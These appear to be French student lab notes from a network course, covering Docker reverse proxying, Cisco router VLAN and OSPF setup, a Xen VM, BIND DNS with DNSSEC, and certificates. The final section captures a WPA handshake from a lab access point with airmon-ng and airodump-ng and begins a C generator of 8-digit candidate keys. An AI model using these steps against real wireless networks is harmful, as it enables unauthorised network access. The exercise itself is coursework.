11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
